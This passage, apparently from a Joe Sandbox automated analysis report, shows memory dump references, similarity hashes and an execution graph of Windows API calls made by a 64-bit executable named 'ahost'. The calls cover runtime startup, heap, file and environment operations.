                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction ID: 775c1a43d4b6b45612d4dd559e58d03c75d4705088c83f1bbd32eaf017fac919
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401252291824686F760BF50AC6527EA2B0EF88748FC40135D66D866EDEF2CE554CEA4

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:10.1%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:1559
                                                                                                                                                                                                                              Total number of Limit Nodes:25
                                                                                                                                                                                                                              execution_graph 10184 7ff7f91fe144 10187 7ff7f920411c fegetenv 10184->10187 10186 7ff7f91fe18e 10188 7ff7f9204180 __std_exception_copy 10187->10188 10189 7ff7f91fa970 9 API calls 10188->10189 10191 7ff7f9204275 _invalid_parameter_noinfo memcpy_s 10188->10191 10190 7ff7f92053a9 10189->10190 10191->10186 10192 7ff7f920ab49 10201 7ff7f91ee4a4 10192->10201 10194 7ff7f920ab9b __CxxCallCatchBlock 10212 7ff7f91edb70 10194->10212 10196 7ff7f920abaf 10198 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10196->10198 10199 7ff7f920abbf 10198->10199 10202 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10201->10202 10203 7ff7f91ee4b6 10202->10203 10204 7ff7f91ee4f1 10203->10204 10205 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10203->10205 10206 7ff7f91ee4c1 10205->10206 10206->10204 10207 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10206->10207 10208 7ff7f91ee4e2 10207->10208 10208->10194 10209 7ff7f91ed9b4 10208->10209 10210 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10209->10210 10211 7ff7f91ed9c2 10210->10211 10211->10194 10215 7ff7f91edb8c 10212->10215 10214 7ff7f91edb79 10214->10196 10216 7ff7f91edba4 10215->10216 10217 7ff7f91edbab GetLastError 10215->10217 10216->10214 10219 7ff7f91edbbe 10217->10219 10218 7ff7f91edc30 SetLastError 10218->10216 10219->10218 10220 7ff7f920894c 10221 7ff7f920897c 10220->10221 10224 7ff7f92089e4 10221->10224 10223 7ff7f9208995 10225 7ff7f91fc2f4 _fread_nolock 2 API calls 10224->10225 10226 7ff7f9208a15 10225->10226 10227 7ff7f91fc2f4 _fread_nolock 2 API calls 10226->10227 10228 7ff7f9208a26 10227->10228 10229 7ff7f9208a4b 10228->10229 10230 7ff7f9208adf 10228->10230 10231 7ff7f9208add 10228->10231 10232 7ff7f91fec08 _fread_nolock HeapAlloc 10229->10232 10230->10231 10233 7ff7f91fc2f4 _fread_nolock 2 API calls 10230->10233 10234 7ff7f91fc2f4 _fread_nolock 2 API calls 10231->10234 10240 7ff7f9208a58 10232->10240 10235 7ff7f9208aef 10233->10235 10236 7ff7f9208b56 10234->10236 10235->10231 10238 7ff7f9208b08 SetEndOfFile 10235->10238 10236->10223 10237 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10237->10231 10238->10231 10239 7ff7f9208b15 GetLastError 10238->10239 10239->10231 10240->10237 10247 7ff7f9200640 10248 7ff7f9200682 10247->10248 10255 7ff7f920066b _invalid_parameter_noinfo 10247->10255 10249 7ff7f9200686 10248->10249 10250 7ff7f91ff628 5 API calls 10248->10250 10251 7ff7f9200751 10249->10251 10253 7ff7f92006d3 10249->10253 10249->10255 10250->10249 10251->10255 10261 7ff7f91f7c48 GetFullPathNameW 10251->10261 10256 7ff7f91f7cbc GetFullPathNameW 10253->10256 10257 7ff7f91f7cef GetLastError 10256->10257 10259 7ff7f91f7d05 10256->10259 10258 7ff7f91f7cfc 10257->10258 10258->10255 10259->10258 10260 7ff7f91f7d5f GetFullPathNameW 10259->10260 10260->10257 10260->10258 10262 7ff7f91f7c6e GetLastError 10261->10262 10263 7ff7f91f7c7b 10261->10263 10262->10263 10263->10255 10762 7ff7f91fb4c0 10763 7ff7f91fb4d0 10762->10763 10765 7ff7f91fb4db __vcrt_uninitialize_ptd 10763->10765 10766 7ff7f91fb338 GetLastError 10763->10766 10767 7ff7f91fb379 FlsSetValue 10766->10767 10773 7ff7f91fb35c 10766->10773 10768 7ff7f91fb369 10767->10768 10769 7ff7f91fb38b 10767->10769 10770 7ff7f91fb3e5 SetLastError 10768->10770 10771 7ff7f91fec08 _fread_nolock HeapAlloc 10769->10771 10770->10765 10772 7ff7f91fb39a 10771->10772 10774 7ff7f91fb3b8 FlsSetValue 10772->10774 10775 7ff7f91fb3a8 FlsSetValue 10772->10775 10773->10767 10773->10768 10777 7ff7f91fb3d6 10774->10777 10778 7ff7f91fb3c4 FlsSetValue 10774->10778 10776 7ff7f91fb3b1 10775->10776 10779 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10776->10779 10780 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10777->10780 10778->10776 10779->10768 10780->10770 10274 7ff7f91f5340 10275 7ff7f91f536a 10274->10275 10276 7ff7f91fec08 _fread_nolock HeapAlloc 10275->10276 10277 7ff7f91f5389 10276->10277 10278 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10277->10278 10279 7ff7f91f5397 10278->10279 10280 7ff7f91fec08 _fread_nolock HeapAlloc 10279->10280 10283 7ff7f91f53c1 10279->10283 10281 7ff7f91f53b3 10280->10281 10282 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10281->10282 10282->10283 10781 7ff7f91e81c0 10782 7ff7f91e81cc 10781->10782 10783 7ff7f91e9400 2 API calls 10782->10783 10784 7ff7f91e81eb 10783->10784 10785 7ff7f91e8206 ExpandEnvironmentStringsW 10784->10785 10790 7ff7f91e81f3 10784->10790 10786 7ff7f91e822c 10785->10786 10787 7ff7f91e8251 GetDriveTypeW 10786->10787 10786->10790 10797 7ff7f91e82af 10786->10797 10789 7ff7f91e82a0 10787->10789 10787->10790 10791 7ff7f91f79dc 9 API calls 10789->10791 10791->10790 10792 7ff7f91e833e CreateDirectoryW 10792->10790 10793 7ff7f91e834d GetLastError 10792->10793 10793->10790 10794 7ff7f91e835a GetLastError 10793->10794 10796 7ff7f91e2c50 5 API calls 10794->10796 10795 7ff7f91e8318 CreateDirectoryW 10795->10797 10796->10790 10797->10790 10797->10792 10797->10795 10798 7ff7f91f1bc0 10799 7ff7f91f1bf3 10798->10799 10800 7ff7f91f0bf0 3 API calls 10799->10800 10801 7ff7f91f1c5f 10799->10801 10800->10801 10802 7ff7f91ecbc0 10805 7ff7f91ecbd0 _set_fmode _RTC_Initialize 10802->10805 10803 7ff7f91ed19c 7 API calls 10804 7ff7f91ecc75 10803->10804 10807 7ff7f91ecc1e 10805->10807 10809 7ff7f91ed13c InitializeSListHead 10805->10809 10807->10803 10808 7ff7f91ecc65 10807->10808 10810 7ff7f920abcf 10813 7ff7f91eda08 10810->10813 10814 7ff7f91eda32 10813->10814 10815 7ff7f91eda20 10813->10815 10817 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10814->10817 10815->10814 10816 7ff7f91eda28 10815->10816 10818 7ff7f91eda30 10816->10818 10820 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10816->10820 10819 7ff7f91eda37 10817->10819 10819->10818 10821 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10819->10821 10822 7ff7f91eda57 10820->10822 10821->10818 10823 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10822->10823 10824 7ff7f91eda64 10823->10824 10825 7ff7f91fa448 10 API calls 10824->10825 10826 7ff7f91eda6d 10825->10826 10290 7ff7f91f963c 10291 7ff7f91f965f 10290->10291 10295 7ff7f91f9676 10290->10295 10292 7ff7f91fec08 _fread_nolock HeapAlloc 10292->10295 10293 7ff7f91f96ea 10294 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10293->10294 10294->10291 10295->10291 10295->10292 10295->10293 10296 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10295->10296 10296->10295 10827 7ff7f91ef9bc 10829 7ff7f91ef8ef __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 10827->10829 10828 7ff7f91ee4f8 GetLastError SetLastError Is_bad_exception_allowed 10828->10829 10829->10828 10297 7ff7f920ac53 10298 7ff7f920ac63 10297->10298 10301 7ff7f91f54e8 LeaveCriticalSection 10298->10301 10302 7ff7f91f8a38 10311 7ff7f9200348 EnterCriticalSection 10302->10311 10312 7ff7f91fa638 10313 7ff7f91fa654 GetLastError SetLastError 10312->10313 10314 7ff7f91fa66c 10312->10314 10313->10314 10315 7ff7f9200938 10316 7ff7f920096c 10315->10316 10344 7ff7f920095c 10315->10344 10317 7ff7f9200c4c 10316->10317 10319 7ff7f920098e 10316->10319 10318 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10317->10318 10318->10344 10320 7ff7f92009d5 10319->10320 10321 7ff7f91fec08 _fread_nolock HeapAlloc 10319->10321 10324 7ff7f92009df 10319->10324 10320->10324 10325 7ff7f9200aeb 10320->10325 10329 7ff7f9200b3d 10320->10329 10323 7ff7f9200a37 10321->10323 10322 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10322->10344 10326 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10323->10326 10324->10322 10328 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10325->10328 10327 7ff7f9200a45 10326->10327 10327->10320 10327->10324 10332 7ff7f91fec08 _fread_nolock HeapAlloc 10327->10332 10330 7ff7f9200af4 10328->10330 10329->10324 10331 7ff7f920344c 5 API calls 10329->10331 10342 7ff7f9200af9 10330->10342 10405 7ff7f920344c 10330->10405 10333 7ff7f9200b7a 10331->10333 10334 7ff7f9200a67 10332->10334 10335 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10333->10335 10337 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10334->10337 10338 7ff7f9200b84 10335->10338 10337->10320 10338->10324 10338->10342 10339 7ff7f9200c40 10341 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10339->10341 10340 7ff7f9200b25 10343 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10340->10343 10341->10344 10342->10339 10345 7ff7f91fec08 _fread_nolock HeapAlloc 10342->10345 10343->10342 10346 7ff7f9200bc8 10345->10346 10347 7ff7f9200bd0 10346->10347 10348 7ff7f9200bd9 __std_exception_copy 10346->10348 10349 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10347->10349 10351 7ff7f9200bf0 10348->10351 10352 7ff7f9200c7b 10348->10352 10350 7ff7f9200bd7 10349->10350 10353 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10350->10353 10411 7ff7f92072b4 10351->10411 10355 7ff7f91fa970 9 API calls 10352->10355 10353->10344 10360 7ff7f9200c8f 10355->10360 10357 7ff7f9200c38 10359 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10357->10359 10358 7ff7f9200c17 10363 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10358->10363 10359->10339 10361 7ff7f9200cb8 10360->10361 10362 7ff7f9200fab 10360->10362 10365 7ff7f9200cea 10360->10365 10364 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10362->10364 10363->10350 10364->10361 10366 7ff7f9200d2f 10365->10366 10367 7ff7f9200da3 10365->10367 10368 7ff7f91fec08 _fread_nolock HeapAlloc 10365->10368 10372 7ff7f9200d39 10365->10372 10366->10372 10373 7ff7f9200e4b 10366->10373 10378 7ff7f9200e9e 10366->10378 10367->10366 10369 7ff7f91fec08 _fread_nolock HeapAlloc 10367->10369 10367->10372 10371 7ff7f9200d95 10368->10371 10374 7ff7f9200dc5 10369->10374 10370 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10370->10361 10375 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10371->10375 10372->10370 10376 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10373->10376 10377 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10374->10377 10375->10367 10379 7ff7f9200e54 10376->10379 10377->10366 10378->10372 10380 7ff7f920344c 5 API calls 10378->10380 10383 7ff7f920344c 5 API calls 10379->10383 10386 7ff7f9200e5a 10379->10386 10381 7ff7f9200edc 10380->10381 10382 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10381->10382 10384 7ff7f9200ee6 10382->10384 10387 7ff7f9200e86 10383->10387 10384->10372 10384->10386 10385 7ff7f9200f9f 10389 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10385->10389 10386->10385 10390 7ff7f91fec08 _fread_nolock HeapAlloc 10386->10390 10388 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10387->10388 10388->10386 10389->10361 10391 7ff7f9200f2b 10390->10391 10392 7ff7f9200f33 10391->10392 10393 7ff7f9200f3c 10391->10393 10394 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10392->10394 10396 7ff7f9200f52 SetEnvironmentVariableW 10393->10396 10397 7ff7f9200fdf 10393->10397 10395 7ff7f9200f3a 10394->10395 10398 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10395->10398 10399 7ff7f9200f76 10396->10399 10400 7ff7f9200f97 10396->10400 10401 7ff7f91fa970 9 API calls 10397->10401 10398->10361 10404 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10399->10404 10403 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10400->10403 10402 7ff7f9200ff3 10401->10402 10403->10385 10404->10395 10406 7ff7f920346e 10405->10406 10407 7ff7f9203495 10406->10407 10410 7ff7f920347c 10406->10410 10419 7ff7f9207ca8 10406->10419 10422 7ff7f9207ce4 10407->10422 10410->10340 10417 7ff7f920731a 10411->10417 10412 7ff7f9207414 10413 7ff7f9207425 10412->10413 10414 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10412->10414 10415 7ff7f9200c13 10413->10415 10416 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10413->10416 10414->10413 10415->10357 10415->10358 10416->10415 10417->10412 10418 7ff7f9207403 SetEnvironmentVariableW 10417->10418 10418->10412 10420 7ff7f9207cca HeapSize 10419->10420 10421 7ff7f9207cb1 _invalid_parameter_noinfo 10419->10421 10421->10407 10423 7ff7f9207d03 10422->10423 10424 7ff7f9207cf9 10422->10424 10426 7ff7f9207d08 10423->10426 10430 7ff7f9207d0f 10423->10430 10425 7ff7f91fd66c _fread_nolock HeapAlloc 10424->10425 10429 7ff7f9207d01 10425->10429 10427 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10426->10427 10427->10429 10428 7ff7f9207d42 HeapReAlloc 10428->10429 10428->10430 10429->10410 10430->10428 10430->10429 10117 7ff7f91f0938 10118 7ff7f91f096f 10117->10118 10119 7ff7f91f0965 _fread_nolock 10117->10119 10119->10118 10121 7ff7f91fd44c 10119->10121 10122 7ff7f91fd46b _fread_nolock 10121->10122 10126 7ff7f91fd473 10122->10126 10127 7ff7f91fd4ac 10122->10127 10133 7ff7f91fd3d0 10122->10133 10124 7ff7f91fd4ed 10129 7ff7f91fd2d8 10124->10129 10126->10119 10127->10124 10127->10126 10138 7ff7f92039ec 10127->10138 10131 7ff7f91fd2fd _fread_nolock 10129->10131 10130 7ff7f91fd32b 10130->10126 10131->10130 10143 7ff7f91fc250 10131->10143 10134 7ff7f91fd3e2 10133->10134 10135 7ff7f91fd3e6 10133->10135 10134->10127 10135->10134 10136 7ff7f91fd409 SetFilePointerEx 10135->10136 10136->10134 10137 7ff7f91fd423 GetFileSizeEx 10136->10137 10137->10134 10139 7ff7f91fec08 _fread_nolock HeapAlloc 10138->10139 10140 7ff7f9203a10 10139->10140 10141 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10140->10141 10142 7ff7f9203a1b 10141->10142 10142->10124 10144 7ff7f91fc280 10143->10144 10147 7ff7f91fc084 10144->10147 10146 7ff7f91fc299 10146->10130 10148 7ff7f91fc0ad 10147->10148 10149 7ff7f91fc0db 10147->10149 10148->10146 10149->10148 10153 7ff7f91f8480 EnterCriticalSection 10149->10153 10151 7ff7f91fc152 10151->10148 10152 7ff7f91fc1a4 _fread_nolock SetFilePointerEx GetLastError 10151->10152 10152->10148 10830 7ff7f91edcb8 10831 7ff7f91edcc0 __vcrt_InitializeCriticalSectionEx 10830->10831 10832 7ff7f91edcf1 10831->10832 10833 7ff7f91edce0 10831->10833 10836 7ff7f91edd00 10832->10836 10833->10831 10834 7ff7f91edced 10833->10834 10837 7ff7f91edd2b 10836->10837 10838 7ff7f91edd2f 10837->10838 10839 7ff7f91edd0e DeleteCriticalSection 10837->10839 10838->10834 10839->10837 10431 7ff7f9208c38 10432 7ff7f9208c86 10431->10432 10433 7ff7f9208cf8 GetCPInfo 10432->10433 10434 7ff7f9208d0d 10432->10434 10436 7ff7f9208d11 10432->10436 10433->10434 10433->10436 10435 7ff7f91fd66c _fread_nolock HeapAlloc 10434->10435 10434->10436 10438 7ff7f9208ddc 10434->10438 10435->10438 10437 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10437->10436 10438->10436 10439 7ff7f91fd66c _fread_nolock HeapAlloc 10438->10439 10440 7ff7f9208e9d 10438->10440 10442 7ff7f9208f2c 10438->10442 10439->10440 10441 7ff7f9208f1a 10440->10441 10440->10442 10444 7ff7f9208f34 10440->10444 10441->10442 10443 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10441->10443 10442->10436 10442->10437 10443->10442 10445 7ff7f9208f73 10444->10445 10446 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10444->10446 10445->10436 10447 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10445->10447 10446->10445 10447->10436 10448 7ff7f91f8154 10449 7ff7f91f8196 10448->10449 10450 7ff7f91fec08 _fread_nolock HeapAlloc 10449->10450 10455 7ff7f91f81ed 10450->10455 10451 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10452 7ff7f91f81fc 10451->10452 10453 7ff7f91f81f5 10453->10451 10454 7ff7f91f8273 10456 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10454->10456 10455->10453 10455->10454 10456->10452 10457 7ff7f91ff154 10458 7ff7f91ff192 10457->10458 10459 7ff7f91ff203 LCMapStringW 10458->10459 10460 7ff7f91ff19a 10458->10460 10459->10460 10461 7ff7f9207454 10462 7ff7f9207461 10461->10462 10463 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10462->10463 10465 7ff7f920747d 10462->10465 10463->10462 10464 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10464->10465 10465->10464 10466 7ff7f92074a0 10465->10466 10840 7ff7f9201cd4 10841 7ff7f9201d02 10840->10841 10841->10841 10842 7ff7f9201d19 10841->10842 10843 7ff7f91fec08 _fread_nolock HeapAlloc 10841->10843 10844 7ff7f9201d4f 10843->10844 10845 7ff7f9201e3e 10844->10845 10846 7ff7f9201dc1 10844->10846 10848 7ff7f9201da4 10844->10848 10849 7ff7f9201dcf 10844->10849 10847 7ff7f91fa970 9 API calls 10845->10847 10852 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10846->10852 10850 7ff7f9201e59 10847->10850 10851 7ff7f91fec08 _fread_nolock HeapAlloc 10848->10851 10853 7ff7f9201db9 10849->10853 10856 7ff7f920344c 5 API calls 10849->10856 10855 7ff7f9201daf 10851->10855 10852->10845 10853->10846 10854 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10853->10854 10854->10846 10857 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10855->10857 10858 7ff7f9201df7 10856->10858 10857->10853 10859 7ff7f9201e12 10858->10859 10860 7ff7f9201dfc 10858->10860 10862 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10859->10862 10861 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10860->10861 10861->10853 10862->10846 10467 7ff7f91e2b50 10468 7ff7f91ec8c0 10467->10468 10469 7ff7f91e2b74 GetCurrentProcessId 10468->10469 10470 7ff7f91e2bc7 10469->10470 10471 7ff7f91f4c48 2 API calls 10470->10471 10472 7ff7f91e2c10 MessageBoxW 10471->10472 10473 7ff7f91e2c40 10472->10473 10863 7ff7f91e4ad0 10864 7ff7f91e9400 2 API calls 10863->10864 10865 7ff7f91e4af5 10864->10865 10866 7ff7f91f99d1 10867 7ff7f91fa448 10 API calls 10866->10867 10868 7ff7f91f99d6 10867->10868 10869 7ff7f91f99fd GetModuleHandleW 10868->10869 10870 7ff7f91f9a47 10868->10870 10869->10870 10873 7ff7f91f9a0a 10869->10873 10871 7ff7f91f9a8a 10870->10871 10881 7ff7f91f9aa0 10870->10881 10873->10870 10876 7ff7f91f9af8 GetModuleHandleExW 10873->10876 10877 7ff7f91f9b3e 10876->10877 10878 7ff7f91f9b2c GetProcAddress 10876->10878 10879 7ff7f91f9b61 10877->10879 10880 7ff7f91f9b5a FreeLibrary 10877->10880 10878->10877 10879->10870 10880->10879 10882 7ff7f91f9aad 10881->10882 10883 7ff7f91f9ac2 10882->10883 10884 7ff7f91f9ab1 GetCurrentProcess TerminateProcess 10882->10884 10885 7ff7f91f9af8 3 API calls 10883->10885 10884->10883 10886 7ff7f91f9ac9 ExitProcess 10885->10886 10887 7ff7f91ff2d0 10888 7ff7f91ff309 10887->10888 10889 7ff7f91ff2da 10887->10889 10889->10888 10890 7ff7f91ff2ef FreeLibrary 10889->10890 10890->10889 10901 7ff7f91f51d0 10902 7ff7f91fb338 9 API calls 10901->10902 10903 7ff7f91f51e7 10902->10903 10904 7ff7f91f51ef 10903->10904 10905 7ff7f91fec08 _fread_nolock HeapAlloc 10903->10905 10908 7ff7f91f5227 10903->10908 10906 7ff7f91f521c 10905->10906 10907 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10906->10907 10907->10908 10908->10904 10909 7ff7f91fa970 9 API calls 10908->10909 10910 7ff7f91f526c 10909->10910 10474 7ff7f920214c 10475 7ff7f9202189 GetCPInfo 10474->10475 10476 7ff7f920219c 10474->10476 10475->10476 10477 7ff7f91edc4c __vcrt_FlsAlloc 10478 7ff7f91edc67 __vcrt_uninitialize_ptd 10477->10478 10479 7ff7f91ecb48 RtlCaptureContext 10480 7ff7f91ecb62 RtlLookupFunctionEntry 10479->10480 10481 7ff7f91ecbb1 10480->10481 10482 7ff7f91ecb78 RtlVirtualUnwind 10480->10482 10482->10480 10482->10481 10483 7ff7f91eca24 10486 7ff7f91eca38 IsProcessorFeaturePresent 10483->10486 10485 7ff7f91eca32 10487 7ff7f91eca4f 10486->10487 10490 7ff7f91ecad8 RtlCaptureContext RtlLookupFunctionEntry 10487->10490 10491 7ff7f91eca63 __raise_securityfailure 10490->10491 10492 7ff7f91ecb08 RtlVirtualUnwind 10490->10492 10491->10485 10492->10491 10911 7ff7f91fa3a0 10912 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10911->10912 10913 7ff7f91fa3b0 10912->10913 10914 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10913->10914 10915 7ff7f91fa3c4 10914->10915 10916 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10915->10916 10917 7ff7f91fa3d8 10916->10917 10918 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10917->10918 10919 7ff7f91fa3ec 10918->10919 10920 7ff7f920a9b0 10923 7ff7f91f8c60 10920->10923 10924 7ff7f91fb338 9 API calls 10923->10924 10925 7ff7f91f8c7e 10924->10925 10926 7ff7f91fc398 GetStartupInfoW 10927 7ff7f91fc3cd 10926->10927 10928 7ff7f91fc467 10926->10928 10927->10928 10932 7ff7f91f83d8 10927->10932 10930 7ff7f91fc3f6 10930->10928 10931 7ff7f91fc420 GetFileType 10930->10931 10931->10930 10933 7ff7f91f8420 10932->10933 10939 7ff7f91f83f7 _invalid_parameter_noinfo 10932->10939 10940 7ff7f9200348 EnterCriticalSection 10933->10940 10939->10930 10154 7ff7f91f5698 10155 7ff7f91f56b2 _invalid_parameter_noinfo 10154->10155 10156 7ff7f91f56cf 10154->10156 10156->10155 10157 7ff7f91f56e2 CreateFileW 10156->10157 10158 7ff7f91f5716 10157->10158 10159 7ff7f91f574c 10157->10159 10161 7ff7f91f5741 CloseHandle 10158->10161 10162 7ff7f91f572b CloseHandle 10158->10162 10166 7ff7f91f5c74 10159->10166 10161->10155 10162->10155 10163 7ff7f91f5751 10165 7ff7f91f5755 10163->10165 10170 7ff7f91f5b70 10163->10170 10165->10155 10168 7ff7f91f5caa 10166->10168 10167 7ff7f91f5d42 10167->10163 10168->10167 10169 7ff7f91f5d34 GetDriveTypeW 10168->10169 10169->10167 10171 7ff7f91f5b8a 10170->10171 10173 7ff7f91f5b9a 10171->10173 10174 7ff7f91ff628 10171->10174 10173->10165 10175 7ff7f920a540 10174->10175 10176 7ff7f91ff65e GetCurrentDirectoryW 10175->10176 10177 7ff7f91ff69c 10176->10177 10180 7ff7f91ff675 10176->10180 10178 7ff7f91fec08 _fread_nolock HeapAlloc 10177->10178 10179 7ff7f91ff6ab 10178->10179 10181 7ff7f91ff6b5 GetCurrentDirectoryW 10179->10181 10182 7ff7f91ff6c4 10179->10182 10180->10173 10181->10182 10183 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10182->10183 10183->10180 10941 7ff7f91eda98 10942 7ff7f91fa448 10 API calls 10941->10942 10943 7ff7f91edaa1 10942->10943 10493 7ff7f9202334 10494 7ff7f9202369 10493->10494 10495 7ff7f9202386 10494->10495 10496 7ff7f91fd66c _fread_nolock HeapAlloc 10494->10496 10497 7ff7f9202397 10496->10497 10498 7ff7f920239f 10497->10498 10500 7ff7f92023ae 10497->10500 10499 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10498->10499 10499->10495 10501 7ff7f92024aa 10500->10501 10504 7ff7f92024c4 10500->10504 10503 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10501->10503 10502 7ff7f9202505 10506 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10502->10506 10503->10495 10504->10502 10505 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10504->10505 10505->10502 10506->10495 10507 7ff7f91ef630 10508 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10507->10508 10509 7ff7f91ef665 10508->10509 10510 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10509->10510 10511 7ff7f91ef673 __except_validate_context_record 10510->10511 10512 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10511->10512 10513 7ff7f91ef6b7 10512->10513 10514 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10513->10514 10515 7ff7f91ef6c0 10514->10515 10516 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10515->10516 10517 7ff7f91ef6c9 10516->10517 10530 7ff7f91ee468 10517->10530 10520 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10521 7ff7f91ef6f9 __CxxCallCatchBlock 10520->10521 10522 7ff7f91ee4a4 __CxxCallCatchBlock 2 API calls 10521->10522 10527 7ff7f91ef7aa 10522->10527 10523 7ff7f91ef7d3 __CxxCallCatchBlock 10524 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10523->10524 10525 7ff7f91ef7e6 10524->10525 10526 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10525->10526 10528 7ff7f91ef7ef 10526->10528 10527->10523 10529 7ff7f91ed9b4 __CxxCallCatchBlock 2 API calls 10527->10529 10529->10523 10531 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10530->10531 10532 7ff7f91ee479 10531->10532 10533 7ff7f91ee484 10532->10533 10534 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10532->10534 10535 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 10533->10535 10534->10533 10536 7ff7f91ee495 10535->10536 10536->10520 10536->10521 10537 7ff7f91f8b2c 10538 7ff7f91f8b51 10537->10538 10545 7ff7f91f8b96 10537->10545 10538->10538 10539 7ff7f91fec08 _fread_nolock HeapAlloc 10538->10539 10538->10545 10540 7ff7f91f8b87 10539->10540 10541 7ff7f91f8b8f 10540->10541 10543 7ff7f91f8ba8 10540->10543 10542 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10541->10542 10542->10545 10544 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10543->10544 10544->10545 9651 7ff7f91eccac 9652 7ff7f91eccc0 9651->9652 9653 7ff7f91ecdf8 9652->9653 9654 7ff7f91eccc8 __scrt_acquire_startup_lock 9652->9654 9773 7ff7f91ed19c IsProcessorFeaturePresent 9653->9773 9656 7ff7f91ece02 9654->9656 9659 7ff7f91ecce6 9654->9659 9657 7ff7f91ed19c 7 API calls 9656->9657 9660 7ff7f91ecd0b 9657->9660 9658 